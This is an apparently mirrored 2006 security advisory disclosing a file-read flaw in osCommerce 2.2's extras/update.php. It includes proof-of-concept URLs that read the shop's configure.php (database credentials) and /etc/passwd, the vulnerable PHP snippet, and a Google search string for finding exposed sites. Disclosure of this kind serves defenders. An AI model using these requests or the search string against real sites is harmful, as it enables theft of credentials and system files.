Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12236
HistoryApr 15, 2006 - 12:00 a.m.

osCommerce "extras/" information/source code disclosure

2006-04-1500:00:00
vulners.com
13

---- osCommerce <= 2.2 "extras/" information/source code disclosure ------------

software site: http://www.oscommerce.com/

if extras/ folder is placed inside the www path, you can see all files on target
system, including php source code with database details, poc:

http://[target]/[path]/extras/update.php?read_me=0&readme_file=…/catalog/includes/configure.php
http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd

this is the vulnerable code in update.php:


include '…/mysql.php';
// if a readme.txt file exists, display it to the user
if(!$read_me) {
if(file_exists('readme.txt')) {
$readme_file = 'readme.txt';
}
elseif(file_exists('README')) {
$readme_file = 'README';
}
elseif(file_exists('readme')) {
$readme_file = 'readme';
}
if($readme_file) {
$readme = file($readme_file);
print "<CENTER><TABLE BORDER=\"1\" WIDTH=\"75%\" CELLPADDING=\"2\" CELLSPACING=\"0\"><TR BGCOLOR=\"#e7e7cc\"><TD>\n";
print nl2br(htmlentities(implode($readme, ' ')));
print "<HR NOSHADE SIZE=\"1\"><CENTER><A HREF=\"update.php?read_me=1\"><B>Continue</B></A></CENTER>\n";
print "</TD></TR></TABLE>\n";
exit;
}
}

google search:

inurl:"extras/update.php" intext:mysql.php -display


rgod

site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/oscommerce_22_adv.html